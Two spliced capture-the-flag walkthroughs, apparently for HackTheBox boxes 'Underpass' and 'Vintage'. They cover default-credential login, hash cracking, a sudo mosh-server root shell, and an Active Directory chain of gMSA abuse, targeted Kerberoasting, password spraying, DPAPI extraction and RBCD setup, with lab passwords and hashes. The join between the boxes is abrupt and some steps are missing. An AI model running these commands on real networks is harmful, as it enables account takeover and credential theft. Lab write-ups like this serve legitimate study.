  Uptime snmp                   : 02:09:58.97
  Uptime system                 : 02:09:45.95
  System date                   : 2025-1-2 02:36:45.0

[*] Network information:

  Default TTL                   : noSuchObject
  TCP segments received         : noSuchObject
  TCP segments sent             : noSuchObject
  TCP segments retrans          : noSuchObject
  Input datagrams               : noSuchObject
  Delivered datagrams           : noSuchObject
  Output datagrams              : noSuchObject

[*] File system information:

  Index                         : noSuchObject
  Mount point                   : noSuchObject
  Access                        : noSuchObject
  Bootable                      : noSuchObject
Now, what??
daloRADIUS is a web-based management interface for a RADIUS (Remote Authentication Dial-In User Service) server. Specifically, it manages FreeRADIUS, a widely used open-source RADIUS server, and its database schema.
💡 Think Box
The mention of “daloradius” strongly suggests that the target has a RADIUS management service, likely running on the web server (port 80) we already have.
A Hunch, but Well-Thought
/daloradius
I got a 403 Forbidden rather than a 404, which tells me the directory exists (directory listing is simply denied) and is most probably the web root of the daloRADIUS application.
Directory Brute Force
Let’s bust subdirectories for /daloradius and hope for the best:
croc@hacker$ sudo feroxbuster -u http://underpass.htb/daloradius -w /usr/share/seclists/Discovery/Web-Content/big.txt

by Ben "epi" Risher 🤓                 ver: 2.10.4
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://underpass.htb/daloradius
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/big.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.10.4
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
403      GET        9l       28w      278c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404      GET        9l       31w      275c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301      GET        9l       28w      319c http://underpass.htb/daloradius => http://underpass.htb/daloradius/
200      GET      412l     3898w    24703c http://underpass.htb/daloradius/ChangeLog
200      GET      340l     2968w    18011c http://underpass.htb/daloradius/LICENSE
301      GET        9l       28w      323c http://underpass.htb/daloradius/app => http://underpass.htb/daloradius/app/
301      GET        9l       28w      327c http://underpass.htb/daloradius/contrib => http://underpass.htb/daloradius/contrib/
301      GET        9l       28w      323c http://underpass.htb/daloradius/doc => http://underpass.htb/daloradius/doc/
301      GET        9l       28w      330c http://underpass.htb/daloradius/app/common => http://underpass.htb/daloradius/app/common/
301      GET        9l       28w      330c http://underpass.htb/daloradius/contrib/db => http://underpass.htb/daloradius/contrib/db/
301      GET        9l       28w      327c http://underpass.htb/daloradius/library => http://underpass.htb/daloradius/library/
301      GET        9l       28w      325c http://underpass.htb/daloradius/setup => http://underpass.htb/daloradius/setup/
301      GET        9l       28w      331c http://underpass.htb/daloradius/doc/install => http://underpass.htb/daloradius/doc/install/
301      GET        9l       28w      333c http://underpass.htb/daloradius/app/operators => http://underpass.htb/daloradius/app/operators/
301      GET        9l       28w      339c http://underpass.htb/daloradius/app/common/includes => http://underpass.htb/daloradius/app/common/includes/
301      GET        9l       28w      338c http://underpass.htb/daloradius/app/common/library => http://underpass.htb/daloradius/app/common/library/
301      GET        9l       28w      335c http://underpass.htb/daloradius/contrib/scripts => http://underpass.htb/daloradius/contrib/scripts/
301      GET        9l       28w      340c http://underpass.htb/daloradius/app/common/templates => http://underpass.htb/daloradius/app/common/templates/
301      GET        9l       28w      341c http://underpass.htb/daloradius/app/operators/include => http://underpass.htb/daloradius/app/operators/include/
301      GET        9l       28w      338c http://underpass.htb/daloradius/app/operators/lang => http://underpass.htb/daloradius/app/operators/lang/
301      GET        9l       28w      341c http://underpass.htb/daloradius/app/operators/library => http://underpass.htb/daloradius/app/operators/library/
301      GET        9l       28w      347c http://underpass.htb/daloradius/app/operators/notifications => http://underpass.htb/daloradius/app/operators/notifications/
301      GET        9l       28w      348c http://underpass.htb/daloradius/app/operators/include/common => http://underpass.htb/daloradius/app/operators/include/common/
301      GET        9l       28w      348c http://underpass.htb/daloradius/app/operators/include/config => http://underpass.htb/daloradius/app/operators/include/config/
301      G
ET        9l       28w      347c http://underpass.htb/daloradius/contrib/scripts/maintenance => http://underpass.htb/daloradius/contrib/scripts/maintenance/
301      GET        9l       28w      340c http://underpass.htb/daloradius/app/operators/static => http://underpass.htb/daloradius/app/operators/static/
301      GET        9l       28w      352c http://underpass.htb/daloradius/app/operators/library/extensions => http://underpass.htb/daloradius/app/operators/library/extensions/
301      GET        9l       28w      352c http://underpass.htb/daloradius/app/operators/include/management => http://underpass.htb/daloradius/app/operators/include/management/
301      GET        9l       28w      346c http://underpass.htb/daloradius/app/operators/include/menu => http://underpass.htb/daloradius/app/operators/include/menu/
301      GET        9l       28w      344c http://underpass.htb/daloradius/app/operators/static/css => http://underpass.htb/daloradius/app/operators/static/css/
301      GET        9l       28w      355c http://underpass.htb/daloradius/contrib/scripts/maintenance/monitor => http://underpass.htb/daloradius/contrib/scripts/maintenance/monitor/
301      GET        9l       28w      347c http://underpass.htb/daloradius/app/operators/static/images => http://underpass.htb/daloradius/app/operators/static/images/
301      GET        9l       28w      348c http://underpass.htb/daloradius/app/operators/library/tables => http://underpass.htb/daloradius/app/operators/library/tables/
301      GET        9l       28w      357c http://underpass.htb/daloradius/app/operators/notifications/templates => http://underpass.htb/daloradius/app/operators/notifications/templates/
[####################] - 24m   409646/409646  0s      found:32      errors:66265
[####################] - 8m     20477/20477   41/s    http://underpass.htb/daloradius/
[####################] - 10m    20477/20477   35/s    http://underpass.htb/daloradius/app/
[####################] - 9m     20477/20477   37/s    http://underpass.htb/daloradius/contrib/
[####################] - 10m    20477/20477   36/s    http://underpass.htb/daloradius/doc/
[####################] - 10m    20477/20477   33/s    http://underpass.htb/daloradius/app/common/
[####################] - 10m    20477/20477   33/s    http://underpass.htb/daloradius/contrib/db/
[####################] - 11m    20477/20477   31/s    http://underpass.htb/daloradius/library/
[####################] - 11m    20477/20477   31/s    http://underpass.htb/daloradius/setup/
[####################] - 13m    20477/20477   26/s    http://underpass.htb/daloradius/app/operators/
[####################] - 12m    20477/20477   28/s    http://underpass.htb/daloradius/doc/install/
[####################] - 13m    20477/20477   26/s    http://underpass.htb/daloradius/app/common/includes/
[####################] - 12m    20477/20477   28/s    http://underpass.htb/daloradius/app/common/library/
[####################] - 13m    20477/20477   27/s    http://underpass.htb/daloradius/contrib/scripts/
[####################] - 11m    20477/20477   30/s    http://underpass.htb/daloradius/app/common/templates/
[####################] - 11m    20477/20477   30/s    http://underpass.htb/daloradius/app/operators/include/
[####################] - 11m    20477/20477   32/s    http://underpass.htb/daloradius/app/operators/lang/
[####################] - 11m    20477/20477   32/s    http://underpass.htb/daloradius/app/operators/library/
/app/operators
Navigating to /daloradius/app/operators, I was redirected to the daloradius login page.
Something that I want you to note here is the difference between the version of the application listed here on the login page and the ChangeLog entry below:
Identifying the correct version is crucial while looking for exploits and CVEs. The version on the login page is certainly the most accurate in my opinion. However, it’s not required for solving this box.
Default Credentials
Whenever I see a login page, my first go-to is default credentials, because they are far too common. The daloRADIUS GitHub repository documents the default operator account, administrator with the password radius:
I tried the default credentials and it worked flawlessly:
The users list contains a single entry: a user named svcMosh with what looks like an MD5-hashed password.
Shell as svcMosh
Hash Cracking
First of all, we must confirm the hash type using hash-identifier:
Hurrah!! We successfully cracked the password! Have some dance lol!
SSH
With ssh being open and a pair of credentials, we can try to gain initial access:
croc@hacker$ ssh svcMosh@10.10.11.48
svcMosh@10.10.11.48's password:
Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 5.15.0-126-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information as of Wed Jan  1 04:31:04 PM UTC 2025

  System load:  0.05               Processes:             230
  Usage of /:   96.5% of 3.75GB    Users logged in:       1
  Memory usage: 17%                IPv4 address for eth0: 10.10.11.48
  Swap usage:   0%

  => / is using 96.5% of 3.75GB

Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status

The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Wed Jan  1 16:21:17 2025 from 10.10.16.17
svcMosh@underpass:~$
The first things that I am looking into after gaining a foothold on a linux box are quick wins like history where there may be a password, sudo permissions or SUID/SGID Binaries.
Sudo Privileges
The user svcMosh has passwordless sudo rights to run /usr/bin/mosh-server as any user, including root.
Briefly, mosh (mobile shell) is a remote terminal application that replaces the interactive part of an SSH session. SSH runs over TCP, so the session is bound to a single connection and breaks when the client changes network or loses connectivity for a while. Mosh uses SSH only to start its server on the remote host, then switches to its own UDP-based protocol with application-level session state, so the session survives roaming and interruptions.
Normally, if we have the target user’s password and mosh installed on the target device, we can just connect to it and it does everything for us. We can see this in action as well.
Install mosh on your Kali Machine by apt install mosh. Then, we can just connect as the svcMosh user because we have his password.
croc@hacker:~$ mosh svcMosh@10.10.11.48
The authenticity of host '10.10.11.48 (<no hostip for proxy command>)' can't be established.
ED25519 key fingerprint is SHA256:zrDqCvZoLSy6MxBOPcuEyN926YtFC94ZCJ5TWRS0VaM.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.48' (ED25519) to the list of known hosts.
svcMosh@10.10.11.48's password:
What it will do is establish a session over SSH & run the mosh-server on the target. After the server starts, SSH disconnects, and the client switches to UDP for communication.
So, we got a shell as svcMosh user. But in order to do this for the root user, we need to have his password which we don’t have currently. So, we’ll take a different route which is the manual way of doing it.
Run the Mosh Server
Run mosh-server manually on the target through sudo. It binds a high UDP port (60000-61000 by default), prints a MOSH CONNECT <port> <key> line containing that port and a base64 session key, and waits for a client. When a client holding that key connects, the server spawns the login shell of the user it is running as; mosh-client reads the key from the MOSH_KEY environment variable and takes the target IP and port as arguments. Since sudo lets us start mosh-server as root, the spawned shell is root's.
And, we got root! Congratulations(to me of course 😂)!
Time-sensitive Connection Requirement
Now, make sure that you connect to the mosh-server within 60 seconds of running it. Otherwise, the server will go down automatically & you will see the following error while connecting using mosh-client:
The $y$ prefix identifies yescrypt, a memory-hard password hashing scheme. Hashcat does not support yescrypt, so I used john to crack this hash.
However, this was going extremely slow so I aborted the session.
I found an SSH id_rsa private key in /root/.ssh and copied it to the current directory. Next, I spun up a Python web server in the same directory:
A STATUS_NOT_SUPPORTED error appeared while connecting to the SMB Server. This is most likely because the SMB server does not support the authentication method being used.
croc@hacker$ impacket-smbclient 'vintage.htb'/'P.Rosa':'Rosaisbest123'@10.10.11.45
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[-] SMB SessionError: code: 0xc00000bb - STATUS_NOT_SUPPORTED - The request is not supported.
On the other hand, I tried Kerberos Authentication and it worked like a charm. However, we don’t have access to any useful shares.
croc@hacker$ impacket-smbclient 'vintage.htb'/'P.Rosa':'Rosaisbest123'@DC01.vintage.htb -k
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[-] CCache file is not found. Skipping...
Type help for list of commands
# shares
ADMIN$
C$
IPC$
NETLOGON
SYSVOL
#
💡 Think Box
I suspect that NTLM authentication is disabled on this box, making Kerberos authentication a requirement.
Ldapdomaindump – 389/TCP
ldapdomaindump has two authentication modes: SIMPLE and NTLM (the default). As NTLM is disabled, I tried SIMPLE and it worked. A SIMPLE bind sends the username and password in clear text unless the connection is protected by TLS (LDAPS or StartTLS), so it is worth noting that the DC accepts it over plain ldap://.
croc@hacker$ sudo /usr/bin/ldapdomaindump ldap://10.10.11.45 -u 'VINTAGE\P.Rosa' -p 'Rosaisbest123' -at SIMPLE
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished
croc@hacker$ ls
domain_computers_by_os.html  domain_groups.grep  domain_policy.html  domain_trusts.json          domain_users.json
domain_computers.grep        domain_groups.html  domain_policy.json  domain_users_by_group.html
domain_computers.html        domain_groups.json  domain_trusts.grep  domain_users.grep
domain_computers.json        domain_policy.grep  domain_trusts.html  domain_users.html
I found C.Neri_adm to be a Remote Desktop User which may allow RDP access if we pivot to this user.
There are a bunch of service accounts as well that might allow kerberoasting:
We also have a couple of Remote management users as well that could lead us to WinRM access:
Several computer accounts were also found:
Since the account lockout threshold is 0 (no lockout), we can password spray without locking accounts out:
💡 Think Box
Now, we know that we also have simple authentication enabled via LDAP which we can utilize for further enumeration.
Ldapsearch – List Users by Groups
An alternative way to enumerate users and their groups is by using ldapsearch with simple authentication:
Note the FS01$ computer account being a part of Pre-Windows 2000 Compatible Access group which we didn’t see earlier in ldapdomaindump output. That is interesting!
BloodHound Collection
I collected the data with bloodhound-python and uploaded it into BloodHound:
The reason that FS01.vintage.htb didn’t resolve here is that the target machine doesn’t have a DNS record for it:
croc@hacker$ nxc ldap DC01.vintage.htb -d 'vintage.htb' -u 'P.Rosa' -p 'Rosaisbest123' -k -M get-network -o ALL=true
LDAP        DC01.vintage.htb 389    DC01             [*] None (name:DC01) (domain:vintage.htb)
LDAP        DC01.vintage.htb 389    DC01             [+] vintage.htb\P.Rosa:Rosaisbest123
GET-NETWORK DC01.vintage.htb 389    DC01             [*] Querying zone for records
GET-NETWORK DC01.vintage.htb 389    DC01             Found 1 records
GET-NETWORK DC01.vintage.htb 389    DC01             [+] Dumped 1 records to /home/kali/.nxc/logs/vintage.htb_network_2025-03-12_150255.log
croc@hacker$ cat /home/kali/.nxc/logs/vintage.htb_network_2025-03-12_150255.log
dc01.vintage.htb    10.10.11.45
Data Analysis
I started with the P.Rosa account since we had its credentials, but I didn’t find anything useful there. Next, I focused on the computer objects, as we had already spotted something interesting—the Pre-Windows 2000 Compatible Access group.
Pre-Windows 2000 Compatible Access group
This group was introduced by Microsoft in Windows 2000 primarily to provide backward compatibility with Windows NT and legacy applications requiring broad read access to Active Directory. According to Microsoft,
It is a backward compatibility group which allows read access on all users and groups in the domain.
I recommend reading the following to understand the security implications of this group:
If a new computer is created as a "Pre-Windows 2000 computer", its initial credential is DOMAIN.TLD\COMPUTERNAME$ with a password equal to the lowercase computer name without the trailing $ (here FS01$:fs01). Once such an account has authenticated, its password normally has to be changed.
As FS01$ is a part of this group, it’s worth checking whether we can do something with it or not. I tried to get a TGT for it which got successful:
croc@hacker$ impacket-getTGT 'vintage.htb/FS01$:fs01' -k -dc-ip DC01.vintage.htb
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Saving ticket in FS01$.ccache
Hence, we own the FS01$ computer object. We can also gain a SMB shell if we want:
I marked FS01 as owned and then under Analysis > Shortest Path from owned Principals, I found that the Domain Computers group, which FS01 is a member of, has ReadGMSAPassword permissions over GMSA01$.
💡 Think Box
This means that FS01$ has the permission to retrieve the password for the GMSA01$ account.
Abusing Group Managed Service Account – GMSA01$
According to BloodHound,
Group Managed Service Accounts are a special type of Active Directory object, where the password for that object is managed by and automatically changed by Domain Controllers on a set interval(check the MSDS-ManagedPasswordInterval attribute).
The intended use of a GMSA is to allow certain computer accounts to retrieve the password for the GMSA, then run local services as the GMSA. An attacker with control of an authorized principal may abuse that privilege to impersonate the GMSA.
Moving forward, I successfully retrieved the NTLM hash for the GMSA01$ account by authenticating as the FS01$ account using bloodyAD.
I then obtained a TGT for GMSA01$ using its NT hash, so we now have full control of the account:
croc@hacker$ impacket-getTGT 'vintage.htb/GMSA01$' -hashes aad3b435b51404eeaad3b435b51404ee:51434c5b357ff89c5f85d994a27f7339 -k
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Saving ticket in GMSA01$.ccache
💡 Think Box
It’s always a good practice to revisit bloodhound when we pivot to a new user to see what we can do.
Revisiting BloodHound
I found that GMSA01$ has the ability to add itself to Service Managers group:
I used bloodyAD to add GMSA01$ to the Service Managers group:
croc@hacker$ KRB5CCNAME=GMSA01\$.ccache bloodyAD -d 'vintage.htb' -u 'GMSA01$' -k --host 'DC01.vintage.htb' add groupMember 'ServiceManagers' 'GMSA01$'
[+] GMSA01$ added to ServiceManagers
Shell as C.Neri
Targeted Kerberoasting – Service Accounts
Investigating the Service Managers group in BloodHound, I found that its members have GenericAll over three service accounts: svc_ldap, svc_sql and svc_ark. GenericAll is full control: the trustee can modify the target object however they wish.
Full control of a user allows us to modify properties of the user in order to perform a targeted kerberoast attack. The tool used will set an arbitrary SPN on all the svc_* accounts, request a TGS and then remove the SPN.
croc@hacker$ KRB5CCNAME=GMSA01\$.ccache python3 targetedKerberoast.py -k --no-pass -d 'vintage.htb' --dc-host 'DC01.vintage.htb' --dc-ip '10.10.11.45'
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[+] Printing hash for (svc_ldap)
$krb5tgs$23$*svc_ldap$VINTAGE.HTB$vintage.htb/svc_ldap*$4cace799b4753e4e7521f512d68046a6$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
[+] Printing hash for (svc_ark)
$krb5tgs$23$*svc_ark$VINTAGE.HTB$vintage.htb/svc_ark*$ee407a467d551f7bafb41550d761efc0$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
Note that this only retrieved the TGS for two service accounts. The svc_sql account is absent from the output. This is because it is not enabled, as you can see below in bloodhound:
💡 Think Box
The best bet is to enable the svc_sql account ourselves, so that we are not missing anything that may lead to further access.
I enabled the svc_sql account using bloodyAD:
croc@hacker$ KRB5CCNAME=GMSA01\$.ccache bloodyAD -u 'gMSA01' --host 'DC01.vintage.htb' -d 'vintage.htb' -k remove uac 'svc_sql' -f ACCOUNTDISABLE
[-] ['ACCOUNTDISABLE'] property flags removed from svc_sql's userAccountControl
Now that the svc_sql account is enabled, running the targeted Kerberoast again retrieved TGS hashes for all three service accounts.
croc@hacker$ KRB5CCNAME=GMSA01\$.ccache python3 targetedKerberoast.py -k --no-pass -d 'vintage.htb' --dc-host 'DC01.vintage.htb' --dc-ip '10.10.11.45'
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[+] Printing hash for (svc_sql)
$krb5tgs$23$*svc_sql$VINTAGE.HTB$vintage.htb/svc_sql*$f335c53b04bd9c45c92837e8434a5f8b$…
[+] Printing hash for (svc_ldap)
$krb5tgs$23$*svc_ldap$VINTAGE.HTB$vintage.htb/svc_ldap*$04ae435466cebf9d090c728e2246d615$…
[+] Printing hash for (svc_ark)
$krb5tgs$23$*svc_ark$VINTAGE.HTB$vintage.htb/svc_ark*$2c51e4092cc7433908e17559948a3638$…
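The two observations above (which accounts came back, and why a disabled account produces no hash) are easy to automate. The following is an added example, not code from the writeup or from targetedKerberoast: it parses the tool's output, reports any expected service account that produced no hash, and computes the userAccountControl value that `remove uac ... -f ACCOUNTDISABLE` writes back. The sample output is constructed from the account names and checksums shown above with made-up ciphertext, so it runs offline.

```python
"""Added example (not from the writeup): parse targetedKerberoast output,
flag expected service accounts that produced no hash, and show what
'bloodyAD remove uac <user> -f ACCOUNTDISABLE' does to userAccountControl."""
import re
from typing import Dict, List

# Subset of userAccountControl bits (values from the Microsoft ADS_USER_FLAG enum).
UAC_FLAGS = {
    "ACCOUNTDISABLE": 0x0002,
    "NORMAL_ACCOUNT": 0x0200,
    "DONT_EXPIRE_PASSWORD": 0x10000,
    "NOT_DELEGATED": 0x100000,
    "DONT_REQ_PREAUTH": 0x400000,
    "TRUSTED_TO_AUTH_FOR_DELEGATION": 0x1000000,
}

# RC4 (etype 23):     $krb5tgs$23$*user$REALM$spn*$checksum$ciphertext
# AES (etype 17/18):  $krb5tgs$18$user$REALM$*spn*$checksum$ciphertext
RC4_RE = re.compile(r"^\$krb5tgs\$23\$\*([^$]+)\$([^$]+)\$([^*]+)\*\$([0-9a-f]+)\$([0-9a-f]+)$")
AES_RE = re.compile(r"^\$krb5tgs\$(17|18)\$([^$]+)\$([^$]+)\$\*([^*]+)\*\$([0-9a-f]+)\$([0-9a-f]+)$")

# Constructed sample: the account names and checksums from the writeup's output,
# with short made-up ciphertext so the block runs without a domain.
SAMPLE_OUTPUT = """[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[+] Printing hash for (svc_ldap)
$krb5tgs$23$*svc_ldap$VINTAGE.HTB$vintage.htb/svc_ldap*$4cace799b4753e4e7521f512d68046a6$0011223344
[+] Printing hash for (svc_ark)
$krb5tgs$23$*svc_ark$VINTAGE.HTB$vintage.htb/svc_ark*$ee407a467d551f7bafb41550d761efc0$5566778899
"""
# Constructed AES-keyed line, to show the second hash layout.
AES_SAMPLE_LINE = "$krb5tgs$18$svc_sql$VINTAGE.HTB$*vintage.htb/svc_sql*$0123456789abcdef01234567$aabbccdd"


def parse_kerberoast_output(text: str) -> List[Dict]:
    """One record per $krb5tgs$ line; status lines are ignored."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        m = RC4_RE.match(line)
        if m:
            etype, user, realm, spn = 23, m.group(1), m.group(2), m.group(3)
        else:
            m = AES_RE.match(line)
            if not m:
                continue
            etype, user, realm, spn = int(m.group(1)), m.group(2), m.group(3), m.group(4)
        records.append({
            "account": user.lower(),
            "realm": realm,
            "spn": spn,
            "etype": etype,
            # etype 23 is keyed with the NT hash (hashcat -m 13100) and is by far the
            # fastest to crack; AES etypes 17/18 are modes 19600/19700 and much slower.
            "hashcat_mode": {23: 13100, 17: 19600, 18: 19700}[etype],
        })
    return records


def missing_accounts(records: List[Dict], expected: List[str]) -> List[str]:
    """Expected service accounts for which no ticket came back (e.g. disabled ones)."""
    found = {r["account"] for r in records}
    return sorted(a.lower() for a in expected if a.lower() not in found)


def decode_uac(value: int) -> List[str]:
    return [name for name, bit in UAC_FLAGS.items() if value & bit]


def remove_uac_flag(value: int, flag: str) -> int:
    """The new userAccountControl value that 'remove uac -f FLAG' writes back."""
    return value & ~UAC_FLAGS[flag]


if __name__ == "__main__":
    recs = parse_kerberoast_output(SAMPLE_OUTPUT)
    for r in recs:
        print(f"{r['account']:10} etype={r['etype']} hashcat -m {r['hashcat_mode']}")
    print("no hash for:", missing_accounts(recs, ["svc_ldap", "svc_sql", "svc_ark"]))
    disabled = 0x0202  # NORMAL_ACCOUNT | ACCOUNTDISABLE, the usual disabled user
    print(decode_uac(disabled), "->", decode_uac(remove_uac_flag(disabled, "ACCOUNTDISABLE")))
```

The etype matters for the cracking step: a domain that still allows RC4 for service tickets hands you etype 23 hashes, which crack orders of magnitude faster than AES ones. If every hash comes back as etype 17 or 18, budget the cracking time accordingly.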
Cracking the TGS Hashes
I used hashcat (mode 13100 for $krb5tgs$23$ hashes) to crack them and, luckily, one of them cracked.
The password for the svc_sql account is Zer0the0ne.
💡 Think Box
The svc_sql account doesn’t have any interesting pathways in BloodHound, so the next best thing is to spray its password across the user list and check for password reuse.
Password Spraying
Users
First, I made a users.txt file with all the users listed in it. Usually, I do this at the very beginning of the box though.
As C.Neri is a member of Remote Management Users, we can get WinRM access. However, as Kerberos authentication is required, we need to set a few things up first.
TGT for C.Neri
We must get the TGT for C.Neri which we will use for authentication afterwards:
croc@hacker$ impacket-getTGT 'vintage.htb/C.Neri:Zer0the0ne' -k -dc-ip 'DC01.vintage.htb'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Saving ticket in C.Neri.ccache
/etc/krb5.conf
We must also configure the /etc/krb5.conf file. Luckily, I found a script that does this for us:
I used the above script to configure the /etc/krb5.conf file for our domain:
croc@hacker$ python3 configure_krb5.py -h
usage: configure_krb5.py [-h] domain_fqdn dc_name

Configure krb5.conf for evil-winrm

positional arguments:
  domain_fqdn  Domain FQDN
  dc_name      Domain Controller Name

options:
  -h, --help   show this help message and exit

croc@hacker$ python3 configure_krb5.py vintage.htb DC01
[*] This script must be run as root
[*] Configuration Data:
[libdefault]
    default_realm = VINTAGE.HTB

[realms]
    VINTAGE.HTB = {
        kdc = dc01.vintage.htb
        admin_server = dc01.vintage.htb
    }

[domain_realm]
    vintage.htb = VINTAGE.HTB
    .vintage.htb = VINTAGE.HTB

[!] Above Configuration will overwrite /etc/krb5.conf, are you sure? [y/N] y
[+] /etc/krb5.conf has been configured
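For reference, here is the same configuration step written from scratch. This is an added example, not the writeup's configure_krb5.py: it renders a krb5.conf for one realm from the domain FQDN and DC name, keeps a .bak copy of any existing file, and uses the standard `[libdefaults]` section name (libkrb5 silently ignores unknown section names, so a typo there means `default_realm` never applies). The `dns_lookup_kdc = false` and `rdns = false` settings are my additions: the first forces the configured KDC rather than a DNS SRV lookup, the second stops reverse DNS from rewriting the host name in the service principal, which otherwise bites when `/etc/hosts` is the only name source.

```python
"""Added example (not the writeup's configure_krb5.py): build a minimal
/etc/krb5.conf for one AD realm and back up whatever was there before."""
from pathlib import Path
from typing import Optional

# dns_lookup_kdc/rdns are my additions; the writeup's script does not emit them.
TEMPLATE = """[libdefaults]
    default_realm = {realm}
    dns_lookup_kdc = false
    rdns = false

[realms]
    {realm} = {{
        kdc = {dc_fqdn}
        admin_server = {dc_fqdn}
    }}

[domain_realm]
    {domain} = {realm}
    .{domain} = {realm}
"""


def build_krb5_conf(domain_fqdn: str, dc_name: str) -> str:
    """Render krb5.conf text. dc_name may be a short name (DC01) or an FQDN."""
    domain = domain_fqdn.strip().rstrip(".").lower()
    if "." not in domain:
        raise ValueError("expected a DNS domain such as vintage.htb")
    dc = dc_name.strip().rstrip(".").lower()
    dc_fqdn = dc if dc.endswith("." + domain) else f"{dc}.{domain}"
    # AD realm names are the upper-cased DNS domain.
    return TEMPLATE.format(realm=domain.upper(), domain=domain, dc_fqdn=dc_fqdn)


def write_krb5_conf(conf: str, path: str = "/etc/krb5.conf") -> Optional[str]:
    """Write conf to path; an existing file is copied to <path>.bak first.
    Returns the backup path, or None when there was nothing to back up."""
    target = Path(path)
    backup = None
    if target.exists():
        backup = str(target) + ".bak"
        Path(backup).write_bytes(target.read_bytes())
    target.write_text(conf)
    return backup


if __name__ == "__main__":
    import sys
    if len(sys.argv) != 3:
        sys.exit(f"usage: {sys.argv[0]} <domain_fqdn> <dc_name>")
    text = build_krb5_conf(sys.argv[1], sys.argv[2])
    print(text)
    if input("Overwrite /etc/krb5.conf? [y/N] ").strip().lower() == "y":
        print("backup:", write_krb5_conf(text))
```

Run it as root (`sudo python3 krb5conf.py vintage.htb DC01`, assuming that file name) and make sure `dc01.vintage.htb` resolves, via DNS or `/etc/hosts`, before trying evil-winrm.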
WinRM
As we have the TGT and /etc/krb5.conf is configured, we can now get WinRM access as C.Neri. One thing to double-check in the generated file: the standard section name is [libdefaults]; libkrb5 ignores sections it does not recognise, so if the file says [libdefault] the default_realm setting silently does nothing and you have to rely on passing the realm explicitly (as -r does below) or fix the file by hand.
croc@hacker$ KRB5CCNAME=C.Neri.ccache evil-winrm -i 'DC01.vintage.htb' -r 'vintage.htb'

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\C.Neri\Documents>
After being stuck for quite a while here, I took a step back and reviewed the information we’ve gathered so far. I noticed that C.Neri has a separate admin account, C.Neri_adm. This led me to consider that the end user may have carried out administrative tasks using C.Neri_adm while logged in as C.Neri — which is quite common.
If that’s the case, there could be cached credentials on the machine worth checking. Let’s see!
Uncovering DPAPI Secrets
DPAPI (Data Protection API) is a Windows component that lets applications store sensitive data (e.g. passwords) in encrypted form, under master keys that are themselves protected with a key derived from the user's logon password. Read more below:
I tried Seatbelt.exe to enumerate the DPAPI blobs but got caught by AV (which is interesting). Mimikatz isn't viable either: it doesn't work well from an evil-winrm session, and AV is in place.
Hence, it’s better to enumerate manually. Windows Credential Manager keeps its DPAPI blobs under C:\Users\<user>\AppData\Roaming\Microsoft\Credentials and the matching master keys under C:\Users\<user>\AppData\Roaming\Microsoft\Protect\<SID>; both are hidden, so list them with dir /a or Get-ChildItem -Force. The following cached credentials were found in C.Neri’s blob storage:
From here, we transfer all of these files to our Kali machine, decrypt the master key with C.Neri’s password, and then use the decrypted master key to decrypt the credential blobs.
Step 03 – Download blobs & master keys
We will stand up an Apache web server on Kali and use PowerShell's [System.Net.WebClient] class to HTTP POST the files back to it. You can use the following guide from 0xBEN:
The password for c.neri_adm is Uncr4ck4bl3P4ssW0rd0312.
Revisiting Bloodhound
I marked c.neri_adm as owned and, under First Degree Object Control, we can see that it has GenericWrite and AddSelf over the Delegated Admins group.
We can further see that the Delegated Admins group has the AllowedToAct edge on DC01.
The DelegatedAdmins group has been granted Resource-Based Constrained Delegation (RBCD) access to DC01.
This allows an attacker to run the S4U2self/S4U2proxy chain to impersonate any domain user (except members of Protected Users and accounts marked "sensitive and cannot be delegated") and receive a valid service ticket for DC01 "as" that user, which can then be used, for example with a cifs/ ticket, to gain file-system access on the Domain Controller.
Abusing this path requires an account with an SPN set and membership in the DelegatedAdmins group, so that it can act as the delegating service.
🎆 Way Forward
C.Neri, being part of the Service Managers group, has GenericAll over all the svc_* accounts. We can use that to set an SPN on, and change the password of, any of the service accounts.
Additionally, C.Neri_adm has GenericWrite over the Delegated Admins group & we can use it to add the service account to the group.
My target service account will be svc_ark. Any of the three would do, but avoid svc_sql: it was disabled initially and a cleanup script runs on the box that may undo changes to it.
Step 01 – Set a SPN
First, we need to set a servicePrincipalName on svc_ark so that it acts as a service account and can request service tickets from the KDC on behalf of other users.
croc@hacker$ KRB5CCNAME=C.Neri.ccache bloodyAD --host 'DC01.vintage.htb' -u 'C.Neri' -d 'vintage.htb' -k set object 'svc_ark' 'servicePrincipalName' -v 'fake/fake'
